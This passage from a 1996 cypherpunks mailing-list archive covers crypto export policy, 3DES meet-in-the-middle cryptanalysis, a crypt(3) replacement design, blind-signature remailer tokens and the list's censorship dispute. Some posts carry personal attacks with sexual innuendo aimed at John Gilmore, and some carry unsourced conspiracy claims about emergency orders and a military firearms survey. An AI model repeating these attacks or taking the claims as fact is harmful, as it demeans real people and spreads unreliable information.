Adam Shostack <adam@homeport.org> writes:
>         What the US government will allow to be exported is not "strong
> encryption."  It is encryption only slightly too strong to be broken
> by an amateur effort.  For the right investment in custom hardware, it
> falls quickly.  (500,000 $US = 3.5 hour avg break).
<snip>
>         In other words, the surveilance state is still winning, and
> American business is still losing.

Umm, I'm not expert, but it seems to me that the proposal removes the
"munitions" classification. It seems the USG has removed its defense
in court chanllenges to export restrictions. Am I totally off-base
here?

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMo5nCMkz/YzIV3P5AQGV6wMAgvyLL+A+aYqDFJIPoXSA5g9Bl2NHObJs
wduNAvsxKSWANYRAOpEm+HKlhVCIHH0ZGQvRTVTrcsLn2AV56HuaR9xOX4dud3kZ
F0rYapIKCyfyj7E3RagYGigXcDSXIWe2
=lKg5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 20:29:50 -0800 (PST)
To: Paul Foley <mycroft@actrix.gen.nz>
Subject: Re: The persistance of reputation
In-Reply-To: <199611161644.FAA08442@mycroft.actrix.gen.nz>
Message-ID: <328E91A3.15FD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley wrote:
> On Fri, 15 Nov 1996 18:23:17 -0800, Dale Thorn wrote:
>    A disinformer posing as an idiot.  Go figure.
> Nice sig...and here I was thinking you were a real idiot.

I'll refrain from saying anything nasty here, since there is no info
in this posting to comment on, i.e., I don't know who you are.

However, when you decide to CC cypherpunks with a flame like you just
did, you could show *them* some consideration by leaving in some of the
material so they know what the hell you're talking about.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Nov 1996 17:19:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Final Solution to the Crypto Problem
Message-ID: <1.5.4.32.19961117011708.007245d0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>Namely, once the infrastructure is deployed, once most electronic commerce
>is handled via card tokens (and card readers are actually pretty cheap, and
>volume will drive the price down further), the President can cite some kind
>of national emergency, or widespread tax evasion, or whatnot, to announce
>that beginning on suc-and-such a date all cards must be licensed, even to
>domestic users.

Not to diminish the validity of Tim's alarm, is there not reason to
anticipate that
these tokens will be crackable. And thus continue the race between crypto 
enforcers and crackers?

In addition to the recent successes against smart cards, there seems to be 
trouble with the government's program for widespread use of Fortezza cards, 
according to complaints of various military and civilian sites. The Fortezza
site at ljl.com seems to have been set up so that open, easily accessible
information could be gotten by the harried military users (see, for example,
the list of Fortezza complaints at http://infosec.nosc.mil ).

Moreover, there is surely to be continued competition among the players
who are trying to increase their market share -- both government and
commercial, both domestic and international. Will they not continue to 
attack each other's crypto products? And will not each nation's government
continue to subsidize their favored producers in international economic and
military contentions?

The point is made on cypherpunks that the odds are increasingly on the 
crackers even if there are periodic gains by behind-the-scenes plots among
the enforcers and there temporary allies (as Tim notes, these are often short-
term romances). And that hardware systems are the most vulnerable due 
to their illusory physical security -- the fatal conceit that brawn can beat 
brains in crypto, as it claims it used to do in iron- and fire-power (that was
before iron became subservient to code).

Finally, take a look at the history of these "emergency" Executive Orders 
outlined in No. 12924 posted by Peter Junger. Then look at the predecessors 
to those at www.house.gov. They go back through several administrations 
and confirm what Hal first raised: there is a concerted effort to get around 
accountability for the continuation of the so-called emergency, and 
successive Congresses have been complicit in the camouflage.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 16 Nov 1996 17:21:49 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Members of Parliament Problem
In-Reply-To: <199611161725.JAA01334@crypt.hfinney.com>
Message-ID: <Pine.SUN.3.95.961116201838.5107B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Hal Finney wrote:
> 
> I don't quite follow how this would work.  If Trent issues a blind
> signature, then that means (doesn't it?) that he doesn't see what he
> is signing.  So how can he confirm that the message is actually from
> a member of the group when he doesn't see it?

There are two ways to do this.

Method number one is to have the person present 100 messages for blind
signature.  You unblind 99, check that the data is there; the odds are
good it's there in other one.  If any of the 99 are duds, you kick the
cheater out of the system.

The disadvantage of course is that the blind signer gets to read the
message.  (Actually the other 99 copies of it, but no secrecy for the
signer.)  This wasn't a problem for digital cash where each "message" was
a unique digital coin, but is a problem here.

Brands has a better scheme that I don't understand exactly.  He recently
attempted to explain it to me thusly:

==start quote

In fact, the original Chaum/Fiat/Naor protocol was cut-and-choose,
where you would basically do the work for 100 coins in order to
obtain a single one that contains your identity; in my protocol
the bank sends to the user a single number, the user responds with
a single challenge, and the bank then provides a single response--
from this the user can compute exactly one blinded coin, that
nevertheless contains an identifier no matter how the user performs
the blinding. As a result, the protocol, while complex as to why
it is secure and in particular why the identifier cannot be gotten
rid of, is highly efficient. (To withdraw a coin, both the bank and
the user need not do more real-time computations than the work
for a single modular *multi*plication (not exponentiation)).

Thanks again!
Stefan Brands,
------------------------------------------------------
CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands
E-mail: brands@cwi.nl, URL: http://www.cwi.nl/~brands/

===end quote

Can anyone tell me more?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 16 Nov 1996 20:26:12 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: PGP3.0 & ElGamal
Message-ID: <Pine.BSF.3.91.961116193436.193B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Yes, but I believe 3DES has an effective key length of only 112 bits.
>> Of course, even this is more than sufficient for a long time to come. 
> 3DES can have an effective key length of 168 bits if 3 keys are used
> instead of two.  There are no security problems that I know of from 
> using 3 keys. 

The Meet In The Middle attack (MITM, not to be confused with Man In The
Middle) is a time-memory tradeoff that works against any multiple
encryption. 

Triple encryption:
ciphertext = encrypt(k3, decrypt(k2, encrypt(k1, plaintext)))
plaintext  = decrypt(k3, encrypt(k2, decrypt(k1, ciphertext)))

An MITM attack, as I understand it, works by decrypting from one end and 
encrypting from the other...

Step 1- decrypt(x3, ciphertext) for every possible x3, and store all the
results. This requires 2^56 operations and 2^56*8 bytes (550 petabytes?)
of memory when done against 3DES. Quite a lot, but it might be doable. 

Step 2- decrypt(x2, encrypt(x1, plaintext)) for every possible x1,x2. 
This require 2^112 steps with 3DES. If the result you get can be found in
the table built by step 1 then you've figured all three keys. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 21:59:57 -0800 (PST)
To: blanc <blancw@cnw.com>
Subject: Re: It Used to Be Eric's Inscrutable Deficiency
In-Reply-To: <01BBD3C9.2396E740@king1-10.cnw.com>
Message-ID: <328E9830.406@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


blanc wrote:
> In glancing through and deleting so many messages about how blasphemous and perverted John Gilmore is for having "censored" one list afficionado (more symbolic
> Strange, too, that those who clamor for freedom of speech are accusing JG of being contrary to his principles.   They expect that just because individuals shou
> In that case, it would mean that because individuals are to be free "to do" as they will, therefore that courtesy and manners are no longer valid, that high st
> It would mean that in the environment of liberty, it would be incorrect for individuals to prevent assaults against themselves or their morals, against their p
> These complaintants against censorship must not understand the purpose for freedom of action, of expression, etc.; that they do not understand the need for bei
> it is so that one may, without interferance from uninvited participants, engage in arranging the elements of one's existence for the greatest benefit to onesel
> The environment of liberty to express oneself also permits the exercise of the highest logic possible to an unfettered intelligence.  Filling up the mailing li

Your text was not line-wrapped or whatever.  All your other postings were
as far as I know.  BTW, I think you're confusing practicality and what's
good for one individual with what's good long-term for everyone.

Perhaps, giving Gilmore the momentary benefit of the doubt, he had his
back against the proverbial wall in some sense, and he did what he felt
he had no choice but to do. Who knows? The point now for many subscribers
is not whether Gilmore had to make one of those damned-if-you-do/damned-
if-you-don't decisions (which we're all glad *we* didn't have to make),
the point is now to look at the fallout, and whether Gilmore is going
to make additional comments/justifications on this list, or whether he
will simply clam up with that old-fashioned hillbilly stubbornness that
my ancestors (for example) were quite famous for.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Date: Sat, 16 Nov 1996 20:57:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: RFC: A UNIX crypt(3) replacement
Message-ID: <199611170451.UAA05059@hyperion.boxes.org>
MIME-Version: 1.0
Content-Type: text/plain



	I'm trying to think of a function to replace UNIX's crypt(3).  
My design criteria are as follows:

	1) I want it to be secure.
	2) I would like to use a cryptographic hash.
	3) I would like to use well understood cryptographic primitives.
	4) I would like to use a salt, and I would like the salt to be
	considerably larger than the current salt.
	5) I would like the process to be able to be more computationally
	intensive than crypt(3).
	6) The ability to use the algorithm in any setting domestic (US)
	and abroad is a concern, but not a primary one.

	#1 is important for the obvious reasons.
	#2 is important because a one way hash allows for a secure way of
checking the original password against the entered password.  No password
should be able to be recovered by simply reading a file, or finding an
internal key.
	#3 is basicly a result of #1
	#4 and 5 makes the password system more resistant to a dictionary-
type attack.  Several of the more popular password guessers (ie: Crack)
get a significant speed increase from the fact that they only have to hash 
each of the words once per salt.  I would like it to be possible for each
user to have an independent salt (for any reasonable system size).  I would
also like this function to be able to be scaled to that it can be slower
than crypt(3).  This will also hinder a dictionary attack.
	#6 is a byproduct of silly legal concerns.

The algorithm that I developed was heavily influenced by RFCs 1852 [1] 
and 1828 [2] (IP Authentication using SHA and MD5, respectively), and 
"Keying Hash Functions for Message Authentication" by Mihir Bellare, 
Ran Canetti, and Hugo Krawczyk [3]

This algorithm borrows several concepts from [3]:
	The idea of the keyed hash, where the key is used as the hash's 
	IV, or Initial Value. Its security is completely based on the
	choice of the key, and the strength of the underlying hash
	function.

	The concept of the NMAC (Nested MAC), and security analysis
	of it.


The Algorithm:

Given that:
. = the concatenation operator
P = the user pass phrase
H(m) = the hash of the message m
l = length of the hash returned by H(m)
H(k,m) = the keyed hash of message m, using key k (as the IV)
N = salt, length l = (n1 . n2) where n1 and n2 are sub-salts
i = the iteration number
E = a temporary value = (e1 . e2)
K = key = (k1,k2), where k1 and k2 are the sub-keys used in the NMAC
NMAC(k, m) = H(k1, H(k2, m))

In several cases a value is said to be equal to the concatenation
of two other values (we'll take N as an example); ie 
N = (n1 . n2)
This means that N is divided into two equal sized chunks, n1 and n2.
(n1 . n2) = N

initially:
(1) E = H (P)
(2) k1 = (e1 . n1), k2 = (e2 . n2)
(3) T0 = NMAC(K, n)

And then:
(4) T(i) = NMAC(K, T(i-1) . n . T(i-1))
(repeat (4) a number of times)

In (1) the user pass phrase is hashed using the non keyed hash, and the 
resulting value is kept in E. 

In (2) k1 is formed by concatenating the first half of E and the
first half of the salt.  k2 is formed by concatenating the second
half of the key with the second half of the salt.  Now each sub-key
is of length l.

In (3) the NMAC of n is assigned to T0

and then in (4) T(i) is calculated by doing the NMAC of the value
of the previous hash concatenated with n concatenated with the value
the previous hash.

Step (4) is repeated a known number of iterations.

"Keying Hash Functions..." [3] seems to imply that the security of this
hash would be based on the length of l and the underlying hash function, H.  
Because of the way that K is used, the security granted is a function 
of l/2, not l.  (For further explanation see [3])

I was thinking of implementing this using SHA-1.  
This would lead to a 160 bit value for l, hence the security would be 
based on an 80 bit key.

Some modifications that I have considered, and would like feedback on
are:

I was thinking of making the keys used for the hash come from the
previous hashes, and then hash a constant string.  ie:
T(i) = NMAC(T(i-2) . T(i-1), P . n . P)
instead of having a more-or-less constant key, and constantly changing
what is being hashed.

I also am not sure that the string that I'm hashing is ideal.  
Would (n . P . n ) be better?

- -------------------------------------------------------------------------
[1] Metzger, P. and Simpson, W. "Request for Comments: 1852, 
	IP Authentication using Keyed SHA"

[2] Metzger, P. and Simpson, W. "Request for Comments: 1828,
	IP Authentication using Keyed MD5"

[3] Bellare, Mihir and Canetti, Ran and Krawczyk, Hugo. "Keying
	Hash Functions for Message Authentication"

I very much appreciate comments on any portion of this, or on my general
approach.
			Thanks,
			Joshua


-----------------------------Joshua E. Hill-----------------------------
|   If you not part of the solution, you're part of the precipitate    |
-------jehill@<gauss.elee|galaxy.csc|w6bhz|tuba.aix>.calpoly.edu--------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Shuttleworth <marks@thawte.com>
Date: Sat, 16 Nov 1996 11:14:48 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: More Euro Key Escrow
In-Reply-To: <9611161725.aa16313@gonzo.ben.algroup.co.uk>
Message-ID: <Pine.LNX.3.95.961116205506.15573B-100000@bilbo.thawte.com>
MIME-Version: 1.0
Content-Type: text/plain



> I've looked more closely at the "Royal Holloway" protocol, supposedly
> under consideration by the EC for key escrow in Europe, though I must say that
> anyone who deploys it will get what they deserve.

I've taken a personal look at this,  and it's awful.  I'd like to make a
formal submission from Thawte to the EC committee in charge.  Even better,
I'd like to muster industry support against escrow schemes in general in
the EC. If any organisations following this thread would like to join us
in that submission,  please contact me directly.

Thanks,
Mark

--
Mark Shuttleworth
Thawte Consulting





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dietrich J. Kappe" <Dietrich_Kappe@redweb.com>
Date: Sat, 16 Nov 1996 19:09:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exploring hooks in MSIE
Message-ID: <328E80BC.FF@redweb.com>
MIME-Version: 1.0
Content-Type: text/plain


A little bird told me that MSIE has Javascript hooks that allow a site
to check whether all Microsoft products on a client machine are properly
licensed. Has anyone investigated the Javascript (err, Jscript)
implementation in MSIE to see if this is true?

The same little bird told me that MS is building some use of this
"feature" into their Websites. Can any MS consultants corroborate on
this issue?

This is just a rumor. The names of the birds have been changed to
protect the innocent.

DJK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Sat, 16 Nov 1996 21:11:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116193634.2811A-100000@jolietjake.com>
Message-ID: <328E9EB6.539E@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Omegaman wrote:
> 
> On Wed, 13 Nov 1996, Declan McCullagh wrote:
> 
> > Yes, I understand this. It's quite obvious; being removed from the
> > subscriber list hasn't slowed Vulis at all. When I was writing the piece
> > Vulis seemed to have slowed his ad hominem attacks and instead was talking
> > about censorship (something that is within the charter of the list), but
>                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> Actually, Declan, it's not.  "info cypherpunks" in the body of a message to
> majordomo@toad.com yields the welcome message to the list -- the closest
> thing to a charter available.  The subjects of censorship and free speech
> are neither mentioned nor alluded to anywhere within that document.

This is true.

Declan's "fight-censorship" list, though, is supposed to be about censorship,
and he's allowing no criticism of his positions there.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 21:58:05 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: One Big Telecoms Company
In-Reply-To: <3.0b36.32.19961116165519.00cebb24@panix.com>
Message-ID: <328EA1DB.64FC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> At 09:23 PM 11/15/96 -0800, Dale Thorn wrote:
> >Progress?  Most major cities (when I was a kid) had *several* competing
> >newspapers,

> Few realize that NYC today has circa 20 daily newspapers (circa 5 in
> English and circa 15 in other languages).
> In addition, I can read a hundred daily newspapers (or more) on the nets.

I'm jealous.  And I'm not kidding.  The NY Times costs $1.50 or $2.00 for
a daily in L.A., and considering the La-La Times is $0.25, paying 6 times
as much for the NY paper seems almost reasonable.

Out here in Disney Hell, we have 2 (count 'em) papers for 12 million or
so people in the L.A. basin, the O.C. Register (same as L.A. Times, but
reflavored for the suburban white folk in Orange County), and of course,
the (barf) L.A. Times itself.

A few years ago, the L.A. Weekly (free) enjoyed both an immense distribution
and a pretty good reputation.  Gone.  Long gone.  There's a much smaller
free weekly in O.C. (of all places) that has much of the credibility that
the L.A. Weekly gave up, but sadly, very limited distribution.

But I'm sure that goes to all levels in comparing NY and L.A.  If you
wanna collect a good stack of independent reading material in NY, I'll
bet you don't have to drive through 100 miles of hell to get the stuff.

So far NY has been pretty well insulated from what goes on here, and I
suppose that's because anyone who values such things as intellectual
freedom would prefer to live there as opposed to La-La land.  But if
you're saying it can't happen there, or that things really are getting
better, no.

Media consolidation is a public fact, it's been all over the financial
pages for some time now.  Have you not heard (just to name a couple of
examples) of the big weapons manufacturers like GE and Westinghouse
buying up NBC, CBS, etc.  Most Americans, you should know, get their
news from these guys.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 16 Nov 1996 19:25:19 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com>
Subject: War Powers, Executive Orders, &c [was: National Emergency]
In-Reply-To: <199611160123.RAA00315@crypt.hfinney.com>
Message-ID: <199611170326.UAA22749@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611160123.RAA00315@crypt.hfinney.com>, on 11/15/96 
   at 05:23 PM, Hal Finney <hal@rain.org> said:

-:  [snip]  The thing
:I found interesting is that it refers to the fact that we are currently
:living under a state of national emergency!  I searched on the whitehouse
:web site and couldn't find the executive order referred to (maybe it was
:classified) 
:
:  [snip]

        I remember, sometime ago, stumbling across a reference  that an 
    Executive Order for a State of National Emergency at the request of 
    James Stanton from Lincoln has never been withdrawn.  

        does not make a lot of difference anyway --Slick Willie would: 

            a) ignore any restrictions not to his liking; or,

            b) write a new one.

        actually, the ones to worry about are the various interlocking
    Executive Orders for FEMA --that is a pure police state with total
    property condemnation without process or compensation.

        that, and the even more ominous "survey" given to all USMC 
    spec-op/recon units (including my oldest boy) and all Navy Seals:
    
        46. The U.S. government declares a ban on the possession, sale,
            transportation, and transfer of all non-sporting firearms. 
            ...Consider the following statement:
      
                I would fire upon U.S. citizens who refuse or resist 
                confiscation of firearms banned by the U.S. government." 

                        --The USMC 29 Palms Combat Arms Survey

    one last parting shot:

          without arms they do not resist; 
            without communication they know not what to resist.
                    --attila
 

--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 21:58:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Don't Feed the Animals!
In-Reply-To: <v03007800aeb405c5abe0@[207.167.93.63]>
Message-ID: <328EA802.1B19@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> Fact is, I now have more people in my Eudora filter file that at any time
> in the four years this list has existed. Also a fact, there are more people
> on this list that at any time in history (despite what some of the New Wave
> journalists are writing about "the death of the Cypherpunks list").

[snip]

> This one case
> involving Vulis was well-described by John: he asked Vulis to stop sending
> 50K byte rants about the Armenians and Turks to the list--consider that
> 50KB x 1500 destinations = 75 MB of outgoing traffic, modulo corrections
> for aliases, compression, etc. Vulis responded with more insults, basically
> saying "Make me!!!!" Gilmore said, "OK."]

[mo' snip]

I've been hammered on for a nearly-50k posting, which is pretty much just
a one-time deal for me, so I know what you're saying.  Is there some way
around this problem? I'd hate to take a coffee break and find my computer
downloaded 100 50kb messages of anything, especially considering the
duplication that takes place here.

I'd hate to think that all of this discussion comes down to a message-size
problem.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Sat, 16 Nov 1996 22:06:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mailing list liability (fwd)
In-Reply-To: <3.0b28.32.19961110014235.0071328c@mail.io.com>
Message-ID: <328EAB6C.2638@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if someone already brought this up, but I don't see it
threading back. (I haven't read the article, either, but I
probably will, since soon I'll be mentoring a political group
in addition to the two technical groups I moderate.)

-rich

Date: Tue, 22 Oct 1996 14:24:59 -0400 (EDT)
From: Mark Eckenwiler <eck@panix.com>
To: cyberia-l@listserv.aol.com, moderators@uunet.uu.net
Subject: New law review article re Usenet moderators


Taylor, Jeffrey M., Liability of Usenet Moderators for
Defamation Published by Others: Flinging the Law of Defamation Into
Cyberspace, Florida Law Review April 1995. v. 47, n. 2 pp. 247-86

I have not yet read it, so I can't vouch for quality of analysis.

--
"We can imagine no reason why, with ordinary care, human toes could not be
left out of chewing tobacco, and if toes are found in chewing tobacco, it
seems to us that somebody has been very careless."  _Pillars v. R.J. Reynolds
Tobacco Co._, 78 So. 365, 366 (Miss. 1918). |  Mark Eckenwiler  eck@panix.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 22:25:26 -0800 (PST)
To: froomkin@law.miami.edu
Subject: Re: Members of Parliament Problem
Message-ID: <199611170625.WAA03050@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
> [Discussion of blind signatures]
>
> Brands has a better scheme that I don't understand exactly.  He recently
> attempted to explain it to me thusly:
>
> [Brands quote elided]
>
> Can anyone tell me more?

We had quite a bit of discussion of Brands' technology on the list a
couple of years ago.  Take a look at <URL:
http://chaos.taylored.com:1000/0Z/Digital-Cash/Protocols/Brands/Brands-Cash-Notes.gz >
which has several pages discussing discrete logs and some of the ideas
behind Brands' protocols.  Unfortunately I am getting cut-off versions
of these pages tonight, along with occasional failures to find a route
to this server, so hopefully it is just the net acting up again.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 16 Nov 1996 19:25:12 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com>
Subject: Re: National Emergency
Message-ID: <199611170326.UAA22741@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007800aeb2dc721dbf@[207.167.93.63]>, on 11/15/96 
   at 06:59 PM, "Timothy C. May" <tcmay@got.net> said:

:[snip...]
:One of the things that most people don't appreciate is that these emergency
:orders are essentially never repealed. (Not too surprising--if I was in
:government, I wouldn't voluntarily give back any additional powers, either.
:And the only consituency for rolling them back is the membership of the
:evil militias, so nothing happens.)
:

        yes, you are absolutely right.  absolute power corrupts 
    absolutely and a government given (or taking) extra powers is not 
    likely to surrender same --they hope everyone forgets?

        maybe there is an analogy:

            militias:       the only way they'll take my weapon
                            is from my cooling, smoking hand....

            prez:           the only way they'll take my executive privileges
                            is to vote me out of office --IF I consent to leave.

--
    without arms they do not resist; 
        without communication they know not what to resist.
                -attila


[snip...]
:Basically, this was one of the alphabet soup of Emergency Orders, National
:Security Decision Directives, and Executive Decisions passed or enacted
:(sometimes in secrecy) during the last 30 years of the Continuing Emergency.

:(Nixon's wage-price freezes, the oil embargo actions, the strategic
:reserves, the anti-inflation measures, various Carter emergencies, and
:various Reagan emergency orders, including NSDD-145, which directly affects
:control of communicaitons, cryptography, etc.)

:FEMA, the Federal Emergency Preparedness Agency, took over several of these
:emergency orders (the running of them) in the late 70s.

:Standard stuff for we conspiracy buffs. One doesn't need to invoke
:historical groups like the Illuminati to see that the levers of power are
:pulled by strange folks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 20:10:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611162203.QAA01201@manifold.algebra.com>
Message-ID: <FaqiXD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Dr.Dimitri Vulis KOTM wrote:
> > You forgot "limp-wristed, EFFeminate, bearded, 50-ish blonde".
>
> What is this supposed to mean? Is that some cultural thing?

"Who", not "what".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 22:32:55 -0800 (PST)
To: ph@netcom.com
Subject: Re: Remailer Abuse Solutions
Message-ID: <199611170631.WAA03064@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ph@netcom.com (Peter Hendrickson)
> Another way to have anonymous posting but not be subjected to spam
> and the like is to dispense tokens every week to the subscribers.
> They can be signed blindly so that anonymity is preserved, just
> like e-cash.

I had proposed a similar idea to this a few years ago.  You would dispense
tokens, each of which needed to be included in an anonymous message.
So this prevents spam.  But it can also deal with abuse.

After sending the message, if it was not abusive, a new blinded token
would be broadcast which could only be decrypted by the sender of the
original message.  But if it was abusive, no new token would be sent.
Remailer users would watch these token broadcasts and get their new
tokens each time they sent a message.  The remailer might have to delay
issuing the replacement tokens for a day or two to give the recipient
time to complain.

If you gave everyone in the world an initial supply of a few tokens,
then every time they abused, they'd lose one.  But as long as they use
the remailer reasonably they can continue to use it forever because they
get a new token for each one they use.  Messages still remain completely
unlinkable and the remailer has no way of learning anything from the
tokens it sees since they were all issued in blinded form.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 20:10:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Another apologist for John Gilmore's censorship
In-Reply-To: <01BBD3C9.2396E740@king1-10.cnw.com>
Message-ID: <cVqiXD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


blanc <blancw@cnw.com> writes:

> In glancing through and deleting so many messages about how blasphemous =
> and perverted John Gilmore is for having "censored" one list afficionado =

Why the quotes? John Gilmore censored me with no quotes.

> Strange, too, that those who clamor for freedom of speech are accusing =
> JG of being contrary to his principles.

No. John Gilmore's actions are contrary to free speech, but his own
principles clearly don't include free speech. He has no credibility.

>                                           They expect that just because =
> individuals should be at liberty to speak, everyone must therefore be =
> prepared to tolerate all manner and kind of insults against themselves =
> (or be a passive witness to it).

Not true. An honorable person would tolerate all speech and either ignore
it or respond with more speech. A dishonorable person, such as John Gilmore,
seeks to silence the speech he doesn't like.

> In that case, it would mean that because individuals are to be free "to =
> do" as they will, therefore that courtesy and manners are no longer =
> valid, that high standards of personal behavior are not important, that =
> self-command is not required, that exercising one's best judgement is of =
> no practical value for life in the real world.

Funny you should mention manners. Censorship is rude. John Gilmore's plug-
pulling has got to be one of the rudest acts ever perpetrated on this
mailing list. Note also that he hasn't pulled the plugs of other very
rude people, like Timmy May (fart).

> It would mean that in the environment of liberty, it would be incorrect =
> for individuals to prevent assaults against themselves or their morals, =
> against their personal preferences, or against their choice of topics =
> for a discussion list which they started.  This would mean that, for =
> instance, it wouldn't be right for free individuals to prevent from =
> being sexually molested, because it would be "censorship" against the =
> perpetrator.

Speech is not action. Action is not speech.

> These complaintants against censorship must not understand the purpose =
> for freedom of action, of expression, etc.; that they do not understand =
> the need for being "free":  =20
>
> it is so that one may, without interferance from uninvited participants, =
> engage in arranging the elements of one's existence for the greatest =
> benefit to oneself.   Tolerating insulting drivel does not fall into =
> that category.
>
> The environment of liberty to express oneself also permits the exercise =
> of the highest logic possible to an unfettered intelligence.  Filling up =
> the mailing list with irrelevant accusations about bizarre sexual =
> practices is not of any logical benefit towards enlightenment on the =
> subjects of encryption or privacy.  =20

I don't think John Gilmore's sexual practices are *that* bizarre. The Kinsey
report estimates that 10% of the population shares his practices.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 22:49:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611170649.WAA03091@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


David Brin has an article in the December issue of Wired arguing that
privacy is obsolete and was never that great an idea in the first place.
I corresponded with him a few years ago when he was working on a draft
of a book which would develop this idea.  Needless to say, I disagreed
with many of his views.  Here is an excerpt from a letter I sent to him
where I defended the notion that privacy is valuable:

===

You suggest that the main motivation which someone might have for protecting
privacy is that they are engaged in some illicit activities:

page 45: "Why should I really care if someone sees this?  I have nothing to
hide."

But aren't exceptions to this quite common in real life?  What about the gay
man who doesn't want to come out of the closet?  What about the
environmentalist who works in the clerical department of an oil company with
little tolerance for such beliefs? What about the closet atheist in the
fundamentalist Midwestern town?

Maybe you'd say that all of these people should expose their secrets, or have
them exposed for them, and that the world would be a better place. (Actually,
you do seem to say this, and I'll discuss it later.)  But I think this assumes
a certain level of tolerance on the part of society. What if this is wrong?
What if society, or just your neighbors, or your boss, is not so tolerant?
What if you lose your job, or get hounded from your neighborhood, once these
secrets are exposed?

I really don't think we have any right to second-guess the decisions people
